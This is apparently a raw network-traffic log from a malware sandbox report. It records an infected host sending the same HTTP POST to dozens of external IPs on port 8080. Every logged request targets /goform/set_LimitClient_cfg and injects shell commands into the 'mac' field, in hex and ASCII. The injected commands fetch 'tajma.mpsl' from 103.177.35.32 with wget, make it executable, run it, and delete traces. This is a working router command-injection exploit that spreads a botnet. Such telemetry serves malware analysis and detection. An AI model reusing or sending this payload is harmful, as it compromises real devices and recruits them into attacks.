                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2144192.168.2.2345230223.21.62.1888080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.431969881 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2145192.168.2.2342498195.179.242.2228080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.431993961 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2146192.168.2.234844898.122.249.368080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.432008982 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2147192.168.2.235923884.110.80.158080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.432038069 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2148192.168.2.234077044.142.200.98080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.432043076 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2149192.168.2.2352276142.41.224.2028080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.432065964 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2150192.168.2.234946270.66.111.1738080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.432261944 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2151192.168.2.2353232155.69.5.1028080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.432279110 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2152192.168.2.234846667.129.2.1918080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.432352066 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2153192.168.2.2335180187.174.230.2288080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.432365894 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2154192.168.2.2336494103.0.47.2368080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.432451963 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2155192.168.2.2358098204.231.144.658080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.432466030 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2156192.168.2.2346796168.14.190.348080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.432491064 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2157192.168.2.2357456102.130.7.2318080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.432574034 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2158192.168.2.2340708166.135.83.1818080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.432583094 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2159192.168.2.2348422130.187.5.2028080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.432617903 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2160192.168.2.2337054221.198.51.1028080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.432652950 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2161192.168.2.2354412110.163.148.778080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.432657003 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2162192.168.2.2347722178.84.22.2018080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.432670116 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2163192.168.2.2338580173.126.63.888080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.432687998 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2164192.168.2.2337838132.162.170.2338080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.432708025 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2165192.168.2.2339962148.147.133.798080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.432738066 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2166192.168.2.2340916136.233.185.1988080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.432761908 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
